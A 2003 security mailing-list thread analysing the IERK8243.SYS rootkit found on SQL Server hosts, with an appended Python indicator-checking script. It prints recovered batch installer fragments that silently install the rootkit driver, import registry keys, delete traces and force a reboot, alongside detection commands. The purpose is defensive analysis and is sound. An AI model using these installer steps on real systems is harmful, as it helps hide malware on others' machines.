Re: IERK Survey

From: Matt Scarborough (vexversa@VERIZON.NET)
Date: 01/30/03

    Date: Thu, 30 Jan 2003 21:52:01 +0000
    From: Matt Scarborough <vexversa@VERIZON.NET>
    To: NTBUGTRAQ@LISTSERV.NTBUGTRAQ.COM

    An unrelated case involved "Hacker Defender." While Hacker Defender is
    also a (more) powerful "rootkit," it is not the culprit here. I was
    wrong about that.

    Regarding six individuals who either
    (a) publicly posted about
    (b) contacted me via e-mail about
    the presence of IERK8243.SYS, all were running SQLServer 2000 or MSDE
    (Microsoft SQLServer 2000 Desktop Engine).

    Recovered bits of an installer:

    SUI = ("Serv-U Installer"?)

    files uploaded by FTP to victim

    sui.exe = SFXRAR IRC bot and pubstro
    sui2.exe = SFXRAR rootkit

    pss.exe = SysInternals PSShutdown.exe

    @del sui.exe /f
    @ren vmm32.exe vmm32.exe
    @vmm32.exe
    @pss.exe -t 0 -f -r -l
    @del g.bat /f

    @echo off
    del sui2.exe /f
    ren ipsechlp.dll ipsechlp.dll
    if not exist ierk8243.sys goto a
    ren ierk8243.sys ierk8243.sys
    move /y ierk8243.sys .\drivers
    :a
    if not exist ierk8243.reg goto b
    regedit /s ierk8243.reg
    del ierk8243.reg /f
    :b
    ipscf989.exe ipsechlp.dll
    del ipscf989.exe /f
    pss.exe -t 0 -f -r -l
    del pss.exe /f
    del g.bat /f

    Detection perhaps using SC.EXE or DEVCON.EXE from the Resource Kit or
    PSDK
    http://support.microsoft.com/?kbid=251192
    It appears the driver(s) cannot hide from directly querying the Services
    Database, locally or remotely.

    sc \\machinename query type= driver

    SERVICE_NAME: ierk8243
    DISPLAY_NAME: ierk8243
            TYPE : 1 KERNEL_DRIVER
            STATE : 4 RUNNING

    (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
            WIN32_EXIT_CODE : 0 (0x0)
            SERVICE_EXIT_CODE : 0 (0x0)
            CHECKPOINT : 0x0
            WAIT_HINT : 0x0

    devcon -m:\\machinename find @ROOT\LEGACY_IERK8243\0000

    devcon -m:\\machinename find @ROOT\LEGACY_POLICYAGENTHLP\0000

    ROOT\LEGACY_POLICYAGENTHLP\0000 :IPSEC Helper Services
    1 matching device(s) found.

    Matt Scarborough 2003-01-30

    On Thu, 30 Jan 2003 15:15:04 -0500, "Russ" wrote
    <E9A01F52DC939448BBDE44ED2E1C468F2406F6@muskie.rc.on.ca>

    > Folks,
    >
    > Here's an off-the-cuff premise that I'd like you to consider, and help
    > me prove or disprove.
    >
    > There have been a few posts (10 or so) from people who say they've found
    > IERK on their SQL boxes after dealing with Slammer. What if IERK were
    > placed on SQL boxes first, then, in order to get the driver installed
    > they launched Slammer to force people to reboot their boxes. By not
    > including anything in Slammer which dropped to the box, people wouldn't
    > be doing much to check the contents of the box after rebooting. If they
    > successfully placed IERK beforehand, it's more likely they'd get it up
    > and running undetected.
    >
    > Would you please check your boxes as per this information;
    >
    > a) The IERK driver can be seen (without entering safe mode) by looking
    > at System Information, then choosing Software Environment, then
    > Drivers; IERK will be listed. This situation only exists if the machine
    > has been rebooted.
    >
    > and/or
    >
    > b) Try to look at Services. If you have IPSEC Helper Services there
    > running, you have the Trojan.
    >
    > and/or
    >
    > c) Look for %systemroot%\system32\ipsechlp.dll
    >
    > and/or
    >
    > d) Run NETSTAT -AN and see if you are listening on port 449.
    >
    > Please, do me a favor, be brief in your response. Just tell me the
    > following information;
    >
    > 1. What OS/SP
    >
    > 2. What Server application is on it (SQL/IIS/Exchange) if any (if none,
    > say whether it's a Workstation or Server)
    >
    > 3. How you discovered it (which of the above methods worked, a, b, c,
    > and/or d)
    >
    > 4. Whether you were listening on 449 *and* you found it using method a,
    > b, and/or c. This thing may not consistently listen on the same port.
    >
    > Reply to this message with your information.
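
    The two checks discussed in this thread (querying the Services Database for the ierk8243 driver / "IPSEC Helper Services", and Russ's NETSTAT test for a listener on port 449), as an added example that is not part of the original post: a Python script that parses captured `sc query type= driver` and `netstat -an` output and flags the indicators named above. The sample outputs are constructed from the text in this thread; `suspicious_drivers` and `listening_on_port` are hypothetical helper names.

```python
import re

# Indicators taken from the thread: driver service name, display name, port.
DRIVER_IOCS = {"ierk8243"}
DISPLAY_IOCS = {"ipsec helper services"}
SUSPECT_PORT = 449

# Constructed sample of `sc query type= driver` output: one benign record
# plus the ierk8243 record as it appeared in the post.
SC_SAMPLE = """
SERVICE_NAME: ExampleDisk
DISPLAY_NAME: Example Disk Driver
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
SERVICE_NAME: ierk8243
DISPLAY_NAME: ierk8243
        TYPE               : 1  KERNEL_DRIVER
        STATE              : 4  RUNNING
                                (STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
"""

# Constructed sample of `netstat -an` output on an SQL Server host.
NETSTAT_SAMPLE = """
  TCP    0.0.0.0:449            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:1433           0.0.0.0:0              LISTENING
  UDP    0.0.0.0:1434           *:*
"""

def parse_sc_query(text):
    """Split sc.exe output into one dict per service (records start at SERVICE_NAME)."""
    services, current = [], None
    for line in text.splitlines():
        m = re.match(r"\s*([A-Z0-9_]+)\s*:\s*(.*)$", line)
        if not m:
            continue                       # skips the "(STOPPABLE,...)" flag lines
        key, value = m.group(1), m.group(2).strip()
        if key == "SERVICE_NAME":
            current = {"SERVICE_NAME": value}
            services.append(current)
        elif current is not None:
            current[key] = value
    return services

def suspicious_drivers(services):
    """Return service names matching the thread's driver/display-name indicators."""
    return [s["SERVICE_NAME"] for s in services
            if s.get("SERVICE_NAME", "").lower() in DRIVER_IOCS
            or s.get("DISPLAY_NAME", "").lower() in DISPLAY_IOCS]

def listening_on_port(netstat_text, port=SUSPECT_PORT):
    """Return TCP local endpoints from netstat -an output that are LISTENING on port."""
    return [p[1] for p in (l.split() for l in netstat_text.splitlines())
            if len(p) >= 4 and p[0] == "TCP" and p[-1] == "LISTENING"
            and p[1].rsplit(":", 1)[-1] == str(port)]
```

As Russ notes, the port may vary between infections, so treat the Services Database query as the primary check and the port test as corroboration.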
